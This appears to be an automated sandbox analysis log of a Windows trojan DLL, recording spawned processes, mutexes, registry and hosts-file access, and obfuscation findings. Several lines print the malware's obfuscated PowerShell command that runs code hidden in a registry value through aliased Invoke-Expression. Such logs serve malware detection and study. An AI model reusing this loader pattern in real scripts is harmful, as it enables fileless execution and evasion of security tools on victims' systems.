Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211214
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
Source: classification engine Classification label: mal100.troj.evad.winDLL@59/52@18/5
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E3309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_013E3309
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{90B75C82-AFA5-4217-B9C4-5396FD38372A}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{94968C51-E390-E6C0-0D08-C77A91BCEB4E}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{BC369832-EBA2-4EDB-55B0-4F6259E4F3B6}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{9CBC1CBB-4BAF-2EBC-B590-AF42B9C45396}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{20549BFE-FFF8-5232-8954-A3A6CDC8873A}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{10D8DBC1-2F4C-C28B-3944-D3167DB8B7AA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B8576863-B7B7-AA31-016C-DB7EC5603F92}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{C44FC282-5318-9641-FD38-372A81EC5BFE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 61b85f75e6a7c.dll Static file information: File size 1781920 > 1048576
Source: 61b85f75e6a7c.dll Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EE97E pushad ; iretd 0_2_013EE982
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EAD40 push ecx; ret 0_2_013EAD49
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB073 push ecx; ret 0_2_013EB083
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0104C85E pushfd ; iretd 0_2_0104C869
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010492B3 push ecx; ret 0_2_010492C3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01048D80 push ecx; ret 0_2_01048D89
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0827 push dword ptr [ebp-00000284h]; ret 0_2_013A087F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [ebp-00000284h]; ret 0_2_013A0A65
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [ebp-0000028Ch]; ret 0_2_013A0AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [esp+10h]; ret 0_2_013A0BFB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0880 push dword ptr [ebp-00000284h]; ret 0_2_013A08B6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC push dword ptr [esp+0Ch]; ret 0_2_013A0C10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC push dword ptr [esp+10h]; ret 0_2_013A0C56
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0A66 push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0ABA push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A06F5 push dword ptr [ebp-00000284h]; ret 0_2_013A0764
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0EC5 push 10021990h; ret 0_2_013A0ECC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB073 push ecx; ret 3_2_049DB083
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DAD40 push ecx; ret 3_2_049DAD49
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DE97E pushad ; iretd 3_2_049DE982
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC push dword ptr [esp+0Ch]; ret 3_2_030E0C10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC push dword ptr [esp+10h]; ret 3_2_030E0C56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0827 push dword ptr [ebp-00000284h]; ret 3_2_030E087F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0A66 push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0880 push dword ptr [ebp-00000284h]; ret 3_2_030E08B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0ABA push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [ebp-00000284h]; ret 3_2_030E0A65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [ebp-0000028Ch]; ret 3_2_030E0AB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [esp+10h]; ret 3_2_030E0BFB
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_010449B3
PE file contains an invalid checksum
Source: jtmpm3o0.dll.35.dr Static PE information: real checksum: 0x0 should be: 0x661a
Source: hupbkl0t.dll.41.dr Static PE information: real checksum: 0x0 should be: 0x8132
Source: wnczrnms.dll.46.dr Static PE information: real checksum: 0x0 should be: 0x9e33
Source: kon0vos3.dll.38.dr Static PE information: real checksum: 0x0 should be: 0x7727
Source: 61b85f75e6a7c.dll Static PE information: real checksum: 0x1ba6ec should be: 0x1c2401
Source: gmpgobli.dll.48.dr Static PE information: real checksum: 0x0 should be: 0x2130
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
